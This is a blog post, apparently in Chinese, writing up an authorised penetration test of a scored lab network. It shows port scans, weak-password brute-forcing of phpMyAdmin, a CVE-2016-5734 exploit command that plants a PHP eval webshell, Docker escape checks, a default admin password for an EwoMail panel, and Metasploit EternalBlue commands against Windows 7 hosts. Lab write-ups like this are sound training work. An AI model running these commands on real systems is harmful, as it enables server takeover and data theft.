孤行归处

Hi!请登陆

一次科信安的渗透测试总结

760895407 2023-11-17 94 11/17

前言

一次去科信安复测后,公司给了两个网段去做复测
具体说明如下:
靶标IP:192.168.101.x 192.168.103.x
说明:
1、测试环境:该环境为测试环境,模拟公司内网业务系统,并在内部设置有多个网段和服务,且这些服务为真实的业务系统、但隐藏了,需要攻击者发掘;该内网除了幻影安全防御系统,无其他安全设备/系统,如防火墙、WAF 、EDR等,但会有警报系统。
2、测试方法:模拟黑客真实攻击的流程,可通过靶标服务器作为跳板,实现内网东西向横移,找到高价值目标(内网其他重要服务)、并窃取其重要数据资产(真实的OA账号、真实flag文档、ssh登录密码),或者模拟内部人员主机感染了木马,通过内部攻击实现信息窃取。
3、测试目标:验证内网安全防御能力。
flag:
1、 获取到目标靶机权限、flag:100分/IP
2、 内网横向到其他机器 1000分/IP
3、 获取到内部的真实文档文件、账号密码、数据库等信息(需要登录成功的截图证明) 1000分/个
4、 完成以上3个步骤不被警报系统发现/记录。 5000分
5、 发现警报系统,并关闭/绕过,能描述警报系统技术原理和机制(可选) 10000分

扣分:
行为被系统记录或者踩蜜根据情况扣分

1.信息收集

首先是对两个网段简单扫描,这里使用的工具是fscan

1.1 192.168.101.X

192.168.101.2:7000 open
192.168.101.4:80 open
192.168.101.2:80 open
192.168.101.3:80 open
192.168.101.2:8020 open
192.168.101.2:8080 open
192.168.101.254:8080 open
192.168.101.2:8010 open
192.168.101.254:8443 open

发现主要开放服务的主机是
192.168.101.2
192.168.101.3
192.168.101.4
192.168.101.254
使用nmap分别扫描各个主机端口具体开放情况
192.168.101.2
主要开放端口为:

22/tcp closed ssh
25/tcp open smtp Postfix smtpd
80/tcp open http nginx
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
443/tcp closed https
465/tcp open ssl/smtp Postfix smtpd
587/tcp open smtp Postfix smtpd
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
7000/tcp open ssl/http nginx
8000/tcp closed http-alt
8010/tcp open http nginx
8080/tcp open http Apache httpd 2.4.10 ((Debian))

主机info是: mail.ewomail.cn
很明显这个主机提供的是一个邮箱服务,使用的是ewomail
image.png

其中8010端口是一个邮箱的后台
1699933486425.png
8080端口是phpMyAdmin 版本4.4.15.6
1699944890067.png
192.168.101.103
主要开放的端口:

80/tcp open http

就扫出了一个80 端口,访问发现是一个o2oa
1699933140594.png

192.168.101.104
主要开放端口为:

22/tcp closed ssh conn-refused
80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))

ssh连接也不可用,只有80端口,访问发现是:
1699933825142.png
phpMyAdmin 版本为:4.4.15.6

192.168.101.254
主要开放的端口为:

700/tcp open ssl/http syn-ack nginx
8080/tcp open http-proxy syn-ack Nginx
8443/tcp open ssl/https-alt syn-ack Nginx

三个端口访问都是iKuai路由web端
1699933986171.png

1.2 192.168.103.X

总体使用sfcan扫描一遍,

192.168.103.254:8080 open
192.168.103.103:22 open
192.168.103.158:22 open
192.168.103.103:135 open
192.168.103.151:135 open
192.168.103.150:135 open
192.168.103.152:135 open
192.168.103.153:135 open
192.168.103.150:22 open
192.168.103.154:135 open
192.168.103.254:8443 open

再具体使用nmap扫描一遍
192.168.103.103 Host: WIN7-PC2;

135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

192.168.103.150 Host: WIN7-PC3;

PORT STATE SERVICE VERSION
22/tcp open ssh?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

192.168.103.151 Host: WIN7-PC9;

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

192.168.103.152 Host: WIN7-PC4;

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup:WORKGROUP)

192.168.103.153 Host: WIN7-PC5;
PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

192.168.103.154 Host: WIN7-PC6;

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

192.168.103.254

PORT STATE SERVICE VERSION
700/tcp open ssl/http nginx
8080/tcp open http-proxy Nginx
8443/tcp open ssl/https-alt Nginx

七台主机在线
其中
192.168.103.103
192.168.103.150 - 192.168.103.154
均为windows7系统 判断可能存在永恒之蓝漏洞
192.168.103.254访问发现是iKuai路由web端
image.png

总结

信息收集到此为止,一个扫描了192.168.101.1/24 和 192.168.103.1/24两个网段

  • 前一个网段主要服务为web业务,渗透思路为寻找弱密码/寻找指纹以往的nday进行攻击
  • 第二个网段主要是主机,其中有多台window7设备,可能包含永恒之蓝漏洞

2.渗透测试 网段1(192.168.101.1/24)

2.1思路分析

渗透应该丛易到难,先打弱密码,再打nday

2.2 phpMyAdmin(192.168.101.4、192.168.101.2:8080)

2.1.1弱密码进入后台

phpMyAdmin大部分漏洞都需要登录才进行,先进行弱密码爆破,发现两个phpMyAdmin都是弱密码admin1231699945054907.png
成功爆破成功,root登录后台
image.png

2.1.2 getshell

这里只展示192.168.101.4 的测试方法,192.168.101.2:8080 方法相同
查看是否可以shell写入image.png
发现没有写入权限
尝试日志写入,将日志打开,并且修改日志文件名字为 h.php
image.png
写入phpinfo()
image.png
访问页面
image.png
回显为空,表示代码没有执行,怀疑有拦截或者没权限写入日志.

phpMyadmin两个常见写入shell方法不行,开始寻找nday
发现nday中 该版本包含
CVE-2016-5734 :后台命令执行RCE
寻找poc运行,成功执行
1699942308904.png
写入一句话木马
python rce.py -u root -p "admin123" -d "gen" http://192.168.101.4:80/ -c "system('echo \'<?php eval($_REQUEST[123])?>\'>3.php')"
使用剑蚁,连接成功
192.168.101.4
image.png
192.168.101.2:8080
1699945332694.png
成功拿下两台phpmyadmin

2.1.3 docker逃逸 192.168.101.4

192.168.101.4主机ls查看
1699942607369.png
发现文件中有.dockerenv
cat查看
1699942787950.png
进程存在docker字段
说明是在docker容器中。

逃逸方法1. Docker Remote API未授权访问逃逸

在使用docker swarm的时候,管理的docker节点上会开放一个TCP端口2375,默认绑定在0.0.0.0上,造成任何人都可以访问管理端的2375端口,任何人都可以远程控制管理的docker环境。
漏洞验证
端口2375未开放 不存在该漏洞

逃逸方法2. privileged特权模式启动容器逃逸

特权模式逃逸是一种最简单有效的逃逸方法,使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,可直接通过chroot切换根目录、写ssh公钥和crontab计划任何等逃逸到宿主机。
漏洞验证
判断是否是特权模式启动,如果是以特权模式启动的话,CapEff对应的掩码值应该为0000003fffffffff。
image.png
发现并不是以特权模式启动 不存在该漏洞

逃逸方法3. 危险挂载导致Docker逃逸

在启动docker容器时,将服务器中的根目录或敏感目录挂载到容器中时,可能会造成docker逃逸
验证
漏洞验证
image.png
发现没有文件挂载,不存在该漏洞

2.1.4 权限提升(192.168.101.2)

总结

通过phpMyAdmin拿下来
192.168.101.4和192.168.101.2 两台主机

2.3 OAO2 (192.168.101.3)

image.png
先爆破弱密码
弱密码爆破失败
寻找nday ,发现有两个nday 都需要登录后才能进行测试
横向端口 发现只开启了 80端口 横向失败

2.4 iKuai路由 (192.168.101.254)

通过nday 漏洞sql注入尝试登录
image.png
发现操作不允许
默认账号密码也无法登录,路由器爆破会被禁ip

2.5 ewomail (192.168.101.2)

192.168.101.2启动了三个web服务
80端口
image.png
8010端口
image.png
8080端口
image.png

其中 已经通过8080端口的phpMyadmin 拿下靶机服务器 具体看2.2

其他测试中,8010端口的后台属于默认密码,可以直接登录.
admin/Ewomail123
image.png

3.渗透测试 网段2(192.168.103.1/24)

3.1思路分析

该网段主要都是主机服务,其中关键的是window7包含永恒之蓝漏洞最好利用

3.2永恒之蓝(192.168.103.103 192.168.103.150-154)

共五台机子可能包含永恒之蓝漏洞
3.2.1 kali VPN搭建
首先在kali搭建vpn进行隧道穿透,以至回显反弹shell 这里使用的是OpenVPN
导入vpn配置文件,通过openvpn命令启动vpn

openvpn --config /xxx.opvn

image.png
vpn连接成功
ip addr
image.png
成功进入内网环境 10.7.7.6

msfconsole
进入msf控制台
search ms17_010
搜索永恒之蓝模块
use 0
使用永恒之蓝攻击模块
image.png
设置RHOST 为攻击机ip 192.168.103.103
set RHOST 192.168.103.103
设置LHOST 为vpn分配的内网地址 10.7.7.6
set LHOST 10.7.7.6
image.png
run 进行攻击
image.png
失败 更换其他window7主机进行攻击
set RHOST 192.168.103.152
成功拿下靶机服务器
6688db5ab610b297746df00d5c2e32a.png
根据测试 192.168.103.1/24 网段中通过永恒之蓝拿下了3台windows主机
192.168.103.151
192.168.103.152
192.168.103.153

3.3其他漏洞

192.168.103.254有一个iKuai资产,通过测试与2.4结论相同

4.总结

通过本次内网渗透,熟悉了内网渗透的基本流程
弱口令依旧是比较严重的问题,nday可以快速打点,永恒之蓝也是一些window7比较常见的漏洞
修复建议:多用复杂密码,最好将系统升级为比较高版本的系统



微信扫描下方的二维码阅读本文

一次科信安的渗透测试总结

- THE END -

760895407

11月17日22:15

最后修改:2023年11月17日
0

非特殊说明,本博所有文章均为博主原创。

相关推荐

一次科信安的渗透测试总结

一次科信安的渗透测试总结

2023-11-17 94℃

共有 0 条评论

emoji表情
😀 😃 😄 😁 😆 😅 😂 🤣 ☺️ 😇 🙂 🙃 😉 😌 😍 😘 😗 😙 😚 😋 😜 😝 😛 🤑 🤓 😎 🤡 🤠 😏 😒 🤗 😞 😔 😟 😕 🙁 ☹️ 😣 😖 😫 😩 😤 😠 😡 😶 😐 😑 😯 😦 😧 😮 😲 😵 😳 😱 😨 😰 😢 😥 🤤 😭 😓 😪 😴 🙄 🤔 🤥 😬 🤐 🤢 🤧 😷 🤒 🤕 😣 😖 😫 😩 😤 😠 😡 😶 😐 😑 😯 😦 😧 😮 😲 😵 😳 😱 😨 😰 😢 😥 🤤 😭 😓 😪 😴 🙄 🤔 🤥 😬 🤐 🤢 🤧 😷 🤒 🤕 😈 👿 👹 👺 💩 👻 💀 ☠️ 👽 👾 🤖 🎃 😺 😸 😹 😻 😼 😽 🙀 😿 😾 👐🏻 🙌🏻 👏🏻 🙏🏻 🤝 👍 👎🏻 👊🏻 ✊🏻 🤛🏻 🤜🏻 🤞🏻 ✌🏻 🤘🏻 👌 👈🏻 👉🏻 👆🏻 👇🏻 ☝🏻 ✋🏻 🤚🏻 🖐🏻 🖖🏻 👋🏻 🤙🏻 💪🏻 🖕🏻 ✍🏻 🤳🏻 💅🏻 💍 💄 💋 👄 👅 👂🏻 👃🏻 👣 👀 👤 👥 👶🏻 👦🏻 👧🏻 👨🏻 👩🏻 👱🏻‍♀️ 👱🏻 👴🏻 👵🏻 👲🏻 👳🏻‍♀️ 👳🏻 👮🏻‍♀️ 👮🏻 👷🏻‍♀️ 👷🏻 💂🏻‍♀️ 💂🏻 🕵🏻‍♀️ 🕵🏻 👩🏻‍⚕️ 👨🏻‍⚕️ 👩🏻‍🌾 👩🏻‍🍳 👨🏻‍🍳 👩🏻‍🎓

友人帐 | 关于

粤ICP备2022021459号-1

归行

Copyright © 孤行归处 Powered WordPress Theme Qzdy